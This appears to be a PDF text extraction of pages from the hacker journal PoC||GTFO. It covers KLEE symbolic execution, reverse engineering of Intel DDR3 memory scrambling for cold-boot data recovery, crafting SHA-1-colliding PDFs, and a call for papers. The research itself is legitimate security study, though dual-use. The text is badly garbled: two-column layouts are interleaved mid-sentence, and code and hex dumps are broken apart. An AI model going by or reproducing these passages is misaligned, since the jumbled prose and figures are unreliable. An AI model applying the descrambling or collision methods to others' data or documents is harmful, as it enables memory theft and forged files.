34 1 1 6 : add ( "_ZdaPv" , h a n d l e D e l e t e A r r a y , f a l s e ) ,
1 1 8 : add ( "_ZdlPv" , h a n d l e D e l e t e , f a l s e ) ,
36 1 2 1 : add ( "_Znaj" , handleNewArray , t r u e ) ,
1 2 3 : add ( "_Znwj" , handleNew , t r u e ) ,
38 1 2 8 : add ( "_Znam" , handleNewArray , t r u e ) ,
1 3 0 : add ( "_Znwm" , handleNew , t r u e ) ,
40 1 3 4 : add ( " __ubsan_handle_add_overflow " , handleAddOverflow , f a l s e ) ,
1 3 5 : add ( " __ubsan_handle_sub_overflow " , handleSubOverflow , f a l s e ) ,
42 1 3 6 : add ( " __ubsan_handle_mul_overflow " , handleMulOverflow , f a l s e ) ,
1 3 7 : add ( " __ubsan_handle_divrem_overflow " , handleDivRemOverflow , f a l s e ) ,
44 j v a n e g u e @ l l v m l a b 1 : ~ / h k l e e $

Figure 27. KLEE Special Function Handlers

56
Symbolic Heap Execution in KLEE
For heap analysis, it appears that KLEE has a
strong limitation of where heap chunks for KLEE
as well as for the target program are maintained
in the same address space. One would need to in-
troduce an allocator proxy46 if we wanted to track
any kind of heap layout fidelity for heap prediction
purpose. There are spatial issues to consider there
as symbolic heap size may lead to heap state space
explosion, so more refined heap management may
be required. It may be that other tools relying on
selective symbolic execution (S2E)47 may be more
suitable for some of these problems.

Analyzing Distributed Applications.


These are more complex use-cases where KLEE
must be modified to track state across distributed
component.48 Several industrially-sized programs
use databases and key-value stores and it is inter-
esting to see what symbolic execution model can be
defined for those. This approach has been applied
to distributed sensor networks and could also be ex-
perimented on distributed software in the cloud.
You can either obtain LLVM code by compiling
with the clang compiler (3.4 for KLEE) or use a
decompiler like McSema49 and its ReMill library.
There are enough success stories to validate sym-
bolic execution as a practical technology; I encour-
age you to come up with your own experiments, to
figure out what is missing in KLEE to make it work
for you. Getting familiar with every corner cases of
KLEE can be very time consuming, so an approach
of “least modification” is typically what I follow.
Beware of restricting yourself to artificial test
suites as, beyond their likeness to real world code,
they do not take into account all the environmental
dependencies that a real project might have. A typ-
ical example is that KLEE does not support inline
assembly. Another is the heap intrusiveness previ-
ously mentioned. These limitations might turn a
golden technique like symbolic execution into a vac-
uous technology if applied to a bad target.
I leave you to that. Have fun and enjoy!

—Julien

46 unzip pocorgtfo18.pdf nextgendebuggers.pdf


47 unzip pocorgtfo18.pdf s2e.pdf
48 unzip pocorgtfo18.pdf kleenet.pdf
49 git clone https://github.com/trailofbits/mcsema

57
18:09 Memory Scrambling on Intel Sandy Bridge DDR3
by Nico Heijningen

Humble greetings neighbors,


Data Scrambled data
I reverse engineered part of the memory scram-
bling included in Intel’s Sandy/Ivy Bridge proces-
State
sors. I have distilled my research in a PoC that can
1 0 1 0
reproduce all 218 possible 1,024 byte scrambler se- Output bits / PRBS
quences from a 1,026 bit starting state.50

For a while now Intel’s memory controllers in- Feedback bit


clude memory scrambling functionality. Intel’s doc-
umentation explains the benefits of scrambling the An analysis of the properties of the cipher stream
data before it is written to memory for reduc- has to our knowledge never been performed. Here
ing power spikes and parasitic coupling.51 Prior I will describe my journey in obtaining the cipher
research on the topic52 53 quotes different Intel stream and analyzing it.
patents.54 First we set out to reproduce the work of Bauer
Furthermore, some details can be deduced by et al.: by performing a cold-boot attack we were
cross-referencing datasheets of other architectures55 , able to obtain a copy of memory. However, because
for example the scrambler is initialized with a ran- this is quite a tedious procedure, it is troublesome
dom 18 bit seed on every boot; the SCRMSEED. to profile different scrambler settings. Bauer’s work
Other than this nothing is publicly known or docu- is built on ‘differential’ scrambler images: scram-
mented by Intel. The prior work shows that scram- bled with one SCRMSEED and descrambled with
bled memory can be descrambled, yet newer versions another. The data obtained by using the procedure
of the scrambler seem to raise the bar, together with of Bauer et al. contains some artifacts because of
prospects of full memory encryption.56 While the this.
scrambler has never been claimed to provide any We found that it is possible to disable the mem-
cryptographic security, it is still nice to know how ory scrambler using an undocumented Intel register
the scrambling mechanism works. and used coreboot to set it early in the boot pro-
cess. We patched coreboot to try and automate
Not much is known as to the internals of the the process of profiling the scrambler. We chose
memory scrambler, Intel’s patents discuss the use the Sandy Bride platform as both Bauer et al.’s
of LFSRs and the work of Bauer et al. has mod- work was based on it and because coreboot’s mem-
eled the scrambler as a stream cipher with a short ory initialization code has been reverse engineered
period. Hence the possibility of a plaintext attack for the platform.57 Although coreboot builds out-
to recover scrambled data: if you know part of the of-the-box for the Gigabyte GA-B75M-D3V moth-
memory content you can obtain the cipher stream by erboard we used, coreboot’s makefile ecosystem is
XORing the scrambled memory with the plaintext. quite something to wrap your head around. The
Once you know the cipher stream you can repeti- code contains some lines dedicated to the memory
tively XOR this with the scrambled data to obtain scrambler, setting the scrambling seed or SCRM-
the original unscrambled data. SEED. I patched the code in Figure 28 to disable the
50 unzip pocorgtfo18.pdf IntelMemoryScrambler.zip
51 See for example Intel’s 3rd generation processor family datasheet section 2.1.6 Data Scrambling.
52 Johannes Bauer, Michael Gruhn, and Felix C. Freiling. “Lest we forget: Cold-boot attacks on scrambled DDR3 memory.”

In: Digital Investigation 16 (2016), S65–S74.


53 Yitbarek, Salessawi Ferede, et al. “Cold Boot Attacks are Still Hot: Security Analysis of Memory Scramblers in Modern

Processors.” High Performance Computer Architecture (HPCA), 2017 IEEE International Symposium on. IEEE, 2017.
54 USA Patents 7945050, 8503678, and 9792246.
55 See 24.1.45 DSCRMSEED of N-series Intel R Pentium R Processors and Intel R Celeron
R Processors Datasheet – Volume
2 of 3, February 2016
56 Both Intel and AMD have introduced their flavor of memory encryption.
57 For most platforms the memory initialization code is only available as an blob from Intel.

58
3784 s t a t i c void s e t _ s c r a m b l i n g _ s e e d ( ramctr_timing ∗ c t r l )
{
3786 int channel ;

3788 /∗ FIXME: we h a r d c o d e s e e d s . Do we need t o u s e some PRNG f o r them?


I don ’ t t h i n k so . ∗/
3790 s t a t i c u32 s e e d s [NUM_CHANNELS] [ 3 ] = {
{0 x00009a36 , 0 x b a f c f d c f , 0 x46d1ab68 } ,
3792 {0 x00028bfa , 0 x 5 3 f e 4 b 4 9 , 0 x19ed5483 }
};
3794 FOR_ALL_POPULATED_CHANNELS {
MCHBAR32( 0 x4020 + 0 x400 ∗ c h a n n e l ) &= ~0 x10000000 ;
3796 w r i t e 3 2 (DEFAULT_MCHBAR + 0 x4034 , s e e d s [ c h a n n e l ] [ 0 ] ) ;
w r i t e 3 2 (DEFAULT_MCHBAR + 0 x403c , s e e d s [ c h a n n e l ] [ 1 ] ) ;
3798 w r i t e 3 2 (DEFAULT_MCHBAR + 0 x4038 , s e e d s [ c h a n n e l ] [ 2 ] ) ;
}
3800 }

Figure 28. Coreboot’s Scrambling Seed for Sandy Bridge

memory scrambler, write all zeroes to memory, reset It is interesting to note that a feedback bit is
the machine, enable the memory scrambler with a being shifted in on every clocktick. Typically only
specific SCRMSEED, and print a specific memory the bit being shifted out of the LFSR would be used
region to the debug console. (COM port.) This way as part of the ‘random’ cipher stream being gener-
we are able to obtain the cipher stream for differ- ated, instead of the LFSR’s complete internal state.
ent SCRMSEEDs. For example when writing eight The latter no longer produces a random stream of
bytes of zeroes to the memory address starting at data, the consequences of this are not known but it
0x10000070 with the scrambler disabled, we read 3A is probably done for performance optimization.
E0 9D 70 4E B8 27 5C back from the same address These properties could suggest multiple con-
once the PC is reset and the scrambler is enabled. structions. For example, layered LFSRs where one
We know that that’s the cipher stream for that mem- LFSR generates the next LFSR’s starting state, and
ory region. A reset is required as the SCRMSEED part of the latter’s internal state being used as out-
can no longer be changed nor the scrambler disabled put. However, the actual construction is unknown.
after memory initialization has finished. (Registers The number of combined LFSRs is not known, nei-
need to be locked before the memory can be initial- ther is their polynomial (positions of the feedback
ized.) taps), nor their length, nor the manner in which
Now some leads by Bauer et al. based on the they’re combined.
Intel patents quickly led us in the direction of ana- Normally it would be possible to deduce such
lyzing the cipher stream as if it were the output of information by choosing a typical length, e.g. 16-
an LFSR. However, taking a look at any one of the bit, LFSR and applying the Berlekamp Massey al-
cipher stream reveals a rather distinctive usage of gorithm. The algorithm uses the first 16-bits in the
a LFSR. It seems as if the complete internal state cipher stream and deduces which polynomials could
of the LFSR is used as the cipher stream for three possibly produce the next bits in the cipher stream.
shifts, after which the internal state is reset into a However, because of the previously described un-
fresh starting state and shifted three times again. knowns this leads us to a dead end. Back to the
(See Figure 29.) drawing board!
00111010 11100000 Automating the cipher stream acquisition by
10011101 01110000 also patching coreboot to parse input from the serial
01001110 10111000 console we were able to dynamically set the SCRM-
00100111 01011100
SEED, then obtain the cipher stream. Writing a
Python script to control the PC via a serial cable en-
abled us to iterate all 218 possible SCRMSEEDs and

59
06 38 83 1C C1 8E 60 C7 E2 20 F1 10 F8 88 7C 44
86 5A C3 2D 61 96 30 CB E1 68 70 B4 B8 5A 5C 2D
D6 D8 EB 6C 75 B6 3A DB 50 F2 28 79 94 3C 4A 1E
3A E0 9D 70 4E B8 27 5C 37 80 1B C0 0D E0 06 F0
LFSR stretch

00111010 11100000 10011101 01110000 01001110 10111000 00100111 01011100

Figure 29. Keyblock

save their accompanying 1024 byte cipher streams. XORed together.


Acquiring all cipher streams took almost a full week. Hence, to reproduce any possible cipher stream
This data now allowed us to try and find relations we only need four such blocks for the address scram-
between the SCRMSEED and the produced cipher bling, and eighteen blocks for the SCRMSEED
stream. Stated differently, is it possible to reproduce scrambling. We have named the eighteen SCRM-
the scrambler’s working by using less than 218 ×1024 SEEDs that produce the latter blocks the (SCRM-
bytes? SEED) toggleseeds. We’ll leave the four address
This analysis was eased once we stumbled upon scrambling blocks for now and focus on the toggle-
a patent describing the use of the memory bus seeds.
as a high speed interconnect, under the name of The next step in distilling the redundancy in the
TeraDIMM.58 Using the memory bus as such, one cipher stream is to exploit the observation that for
would only receive scrambled data on the other end, specific toggleseeds parts of the 64 byte blocks over-
hence the data needs to be descrambled. The au- lap in a sequential manner. (See Figure 32.) The
thors give away some of their knowledge on the sub- 18 toggleseeds can be placed in four groups and any
ject: the cipher stream can be built from XORing block of data associated with the toggleseeds can be
specific regions of the stream together. This insight reproduced by picking a different offset in the non-
paved the way for our research into the memory redundant stream of one of the four groups. Go-
scrambling. ing back from the overlapping stream to the cipher
The main distinction that the TeraDIMM patent stream of SCRMSEED 0x100 we start at an offset
makes is the scrambling applied is based on four of 16 bytes and take 64 bytes, obtaining 00 30 80
bits of the memory address versus the scrambling ... 87 b7 c3.
based on the (18-bit) SCRMSEED. Both the mem-
ory address- and SCRMSEED-based scrambling are
used to generate the cipher stream 64 byte blocks
at a time.59 Each 64 byte cipher-stream-block is a
(linear) combination of different blocks of data that
are selected with respect to the bits of the memory
address. See Figure 30.
Because the address-based scrambling does not
depend on the SCRMSEED, this is canceled out in
the differential images obtained by Bauer. This is
how far the TeraDIMM patent takes us; however,
with this and our data in mind it was easy to see
that the SCRMSEED based scrambling is also built
up by XORing blocks together. Again depending on
the bits of the SCRMSEED set, different blocks are
58 US Patent 8713379.
59 This is the largest amount of data that can be burst over the DDR3 bus.

60
Figure 30. TeraDIMM Scrambling

   
0000 1100 0000 stretch0 Finally, the overlapping streams of two of the
   

 0000 0110 0000  
  stretch1 
 four groups can be used to define the other two;
   
 0000 0011 0000   stretch2  by combining specific eight byte stretches i.e., mul-
   
 0000 0001 1000   stretch3 
    tiplying the stream with a static matrix. For ex-
   
 0000 0000 1100   stretch4 
   

 0000 0000 0110
 
•

stretch5 
ample, to obtain the first stretch of the overlapping
overlappingstream( z )    

 0000 0000 0011  
  stretch6 

stream of SCRMSEEDs 0x4, 0x10, 0x100, 0x1000,
   


0001 0000 0011  
 
stretch7 
 and 0x10000 we combine the fifth and the sixth
 0001 1000 0011   stretch8 


 
 

 stretch of the overlapping stream of SCRMSEEDs
 0001 1100 0011   stretch9 
    0x1, 0x40, 0x400, and 0x4000. That is 20 00
   
 0001 1110 0011   stretch10 
0001 1111 0011 stretch11
10 00 08 00 04 00 = 00 01 00 00 00 00 00 00
ˆ 20 01 10 00 08 00 04 00. The matrix is the
same between the two groups and provided in Fig-
Figure 31. Scrambler Matrix
ure 31. One is invited to verify the correctness of
that figure using Figure 32.
Some future work remains to be done. We pos-
tulate the existence of a mathematical basis to these
observations, but a nice mathematical relationship
underpinning the observations is yet to be found.
Any additional details can be found in my TUE the-
sis.60

60 unzip pocorgtfo18.pdf heijningen-thesis.pdf

61
SCRMSEED=0x4 SCRMSEED=0x1
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa
be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56 e7 d1 f3 e8 79 f4 3c fa 61 cf 30 e7 18 73 8c 39

SCRMSEED=0x10
20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3

SCRMSEED=0x100 SCRMSEED=0x40
00 30 80 18 40 0c 20 06 04 a8 02 54 01 2a 00 95 80 02 40 01 20 00 10 00 06 18 83 0c c1 86 e0 c3
43 4a 21 a5 10 d2 08 69 00 04 00 02 80 01 40 00 38 00 1c 00 0e 00 07 00 00 01 00 00 00 00 00 00
80 06 40 03 a0 01 50 00 86 1e c3 0f 61 87 b0 c3 20 01 10 00 08 00 04 00 20 31 90 18 48 0c 24 06
be 1e df 0f 6f 87 b7 c3 be 1f df 0f 6f 87 b7 c3 24 99 92 4c 49 26 24 93 67 d3 b3 e9 59 f4 2c fa

SCRMSEED=0x1000 SCRMSEED=0x400
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 06 18 83 0c c1 86 e0 c3 38 00 1c 00 0e 00 07 00
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00

62
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa

SCRMSEED=0x10000 SCRMSEED=0x4000
43 4a 21 a5 10 d2 08 69 00 04 00 02 80 01 40 00 38 00 1c 00 0e 00 07 00 00 01 00 00 00 00 00 00
80 06 40 03 a0 01 50 00 86 1e c3 0f 61 87 b0 c3 20 01 10 00 08 00 04 00 20 31 90 18 48 0c 24 06
be 1e df 0f 6f 87 b7 c3 be 1f df 0f 6f 87 b7 c3 24 99 92 4c 49 26 24 93 67 d3 b3 e9 59 f4 2c fa
9e 1e cf 0f 67 87 b3 c3 be 2f 5f 17 2f 8b 97 c5 67 d7 b3 eb d9 f5 6c fa e7 d1 f3 e8 79 f4 3c fa

The non-redundant/overlapping stream of SCRMSEEDS The non-redundant/overlapping stream of SCRMSEEDS


0x4, 0x10, 0x100, 0x1000, and 0x10000: 0x1, 0x40, 0x400, and 0x4000:
20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06 80 02 40 01 20 00 10 00
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 06 18 83 0c c1 86 e0 c3 38 00 1c 00 0e 00 07 00
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa
be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56 e7 d1 f3 e8 79 f4 3c fa 61 cf 30 e7 18 73 8c 39

Figure 32. Overlapping Streams


18:10 Easy SHA-1 Colliding PDFs with PDFLaTeX.
by Ange Albertini

In the summer of 2015, I worked with Marc do some postprocessing magic: since we can’t actu-
Stevens on the re-usability of a SHA1 collision: de- ally build the whole PDF file with the perfect preci-
termining a prefix could enable us to craft an infinite sion for hash collisions, we’ll just use placeholders for
amount of valid PDF pairs, with arbitrary content each of the objects. We also need to tell PDFLATEX
with a SHA-1 collision. to disable decompression in this group of objects.
000: .% .P .D .F .- .1 .. .3 \n .% E2 E3 CF D3 \n \n Here’s how to do it in PDFLATEX. You may have
010: \n .1 .0 .o .b .j \n .< .< ./ .W .i .d .t to put that even before the documentclass decla-
020: .h .2 .0 .R ./ .H .e .i .g .h .t .3
030: .0 .R ./ .T .y .p .e .4 .0 .R ./
ration to make sure the first PDF objects are not
040: .S .u .b .t .y .p .e .5 .0 .R ./ .F .i reserved yet.
050: .l .t .e .r .6 .0 .R ./ .C .o .l .o .r
060: .S .p .a .c .e .7 .0 .R ./ .L .e .n .g \ begingroup
070: .t .h .8 .0 .R ./ .B .i .t .s .P .e .r 2
080: .C .o .m .p .o .n .e .n .t .8 .> .> \n .s .t \ p d f c o m p r e s s l e v e l =0\ r e l a x
090: .r .e .a .m \n FF D8 FF FE 00 24 .S .H .A .- .1 4
0a0: .i .s .d .e .a .d .! .! .! .! .! 85 2F EC \ immediate \ pdfximage width 40 pt {< f o o . jpg >}
0b0: 09 23 39 75 9C 39 B1 A1 C6 3C 4C 97 E1 FF FE 01 6
0c0: ?? \ immediate \ p d f o b j {65535} %/Width
The first SHA-1 colliding pair of PDF files were 8 \ immediate \ p d f o b j {65535} %/H e i g h t
released in February 2017.61 I documented the pro- \ immediate \ p d f o b j {/ XObject } %/Type
10 \ immediate \ p d f o b j {/ Image } %/SubType
cess and the result in my “Exploiting hash collisions” \ immediate \ p d f o b j {/DCTDecode} %/ F i l t e r s
presentation. 12 \ immediate \ p d f o b j {/ DeviceGray } %/C o l o r S p a c e
The resulting prefix declares a PDF, with a PDF \ immediate \ p d f o b j {123456789} %/Length
object declaring an image as object 1, with refer- 14
\ endgroup
ences to further objects 2–8 in the file for the prop-
erties of the image:
PDF signature 000: %PDF-1.3
non-ASCII marker 009: %âãÏÓ Then we just need to get the reference to the
object declaration 011: 1 0 obj
image object properties 019: <</Width 2 0 R/Height 3 0 R/Type 4 0 R last PDF image object, and we can now display our
/Subtype 5 0 R/Filter 6 0 R image wherever we want
/ColorSpace 7 0 R/Length 8 0 R
/BitsPerComponent 8>>
stream content start 08e: stream 1 \ edef \ shattered {
JPEG Start Of Image 095: FF D8 length: 36 \ pdfrefximage \ the \ pdflastximage }
JPEG comment 097: FF FE 00 24
hidden death statement 09b: SHA-1 is dead!!!
randomization buffer 0ad: 85 2F .. .. 97 E1
JPEG comment 0bd: FF FE 01 byte with a xor
start of collision block 0c0: ?? difference of 0x0C
We then just need to actually overwrite the first
length: 01??
eight objects of a colliding PDF, and everything falls
The PDF is otherwise entirely normal. It’s just into place.62 You can optionally adjust the XREF
a PDF with its first eight objects used, and with a table for a perfectly standard, SHA-1 colliding, and
image of fixed dimensions and colorspace, with two automatically generated PDF pair
different contents in each of the colliding files.
The image can be displayed one or many times,
with optional clipping, and the raw data of the im-
age can be also used as page content under specific
readers (non browsers) if stored losslessly repeating
lines of code eight times.
The rest of the file is totally standard. It could
be actually a standard academic paper like this one.
We just need to tell PDFLATEX that object 1 is
an image, that the next seven objects are taken, and
61 unzip pocorgtfo14.pdf shattered.pdf
62 See https://alf.nu/SHA1 or unzip pocorgtfo18.pdf sha1collider.zip.

63
18:11 Bring out your dead! Bugs, that is.
from the desk of Pastor Manul Laphroaig,
Tract Association of PoCkGTFO.

Dearest neighbor,
Our scruffy little gang started this самиздат
journal a few years back because we didn’t much like
the academic ones, but also because we wanted to
learn new tricks for reverse engineering. We wanted
to publish the methods that make exploits and poly-
glots possible, so that folks could learn from each
other. Over the years, we’ve been blessed with the
privilege of editing these tricks, of seeing them early,
Now it’s your turn to share what you know, that
and of seeing them through to print.
nifty little truth that other folks might not yet know.
It could be simple, or a bit advanced. Whatever
your nifty tricks, if they are clever, we would like to
publish them.
Do this: write an email in 7-bit ASCII telling
our editors how to reproduce ONE clever, techni-
cal trick from your research. If you are uncertain of
your English, we’ll happily translate from French,
Russian, Southern Appalachian, and German.
Like an email, keep it short. Like an email, you
should assume that we already know more than a
bit about hacking, and that we’ll be insulted or—
WORSE!—that we’ll be bored if you include a long
tutorial where a quick explanation would do.
Teach me how to falsify a freshman physics ex-
periment by abusing floating-point edge cases. Show
me how to enumerate the behavior of all illegal in-
structions in a particular implementation of 6502,
or how to quickly blacklist any byte from amd64
shellcode. Explain to me how shellcode in Wine or
ReactOS might be simpler than in real Windows.
Don’t tell us that it’s possible; rather, teach us
how to do it ourselves with the absolute minimum
of formality and bullshit.
Like an email, we expect informal language and
hand-sketched diagrams. Write it in a single sit-
ting, and leave any editing for your poor preacher-
man to do over a bottle of fine scotch. Send this
to pastor@phrack org and hope that the neighborly
Phrack folks—praise be to them!—aren’t man-in-the-
middling our submission process.

Yours in PoC and Pwnage,


Pastor Manul Laphroaig, T G S B

64

Potrebbero piacerti anche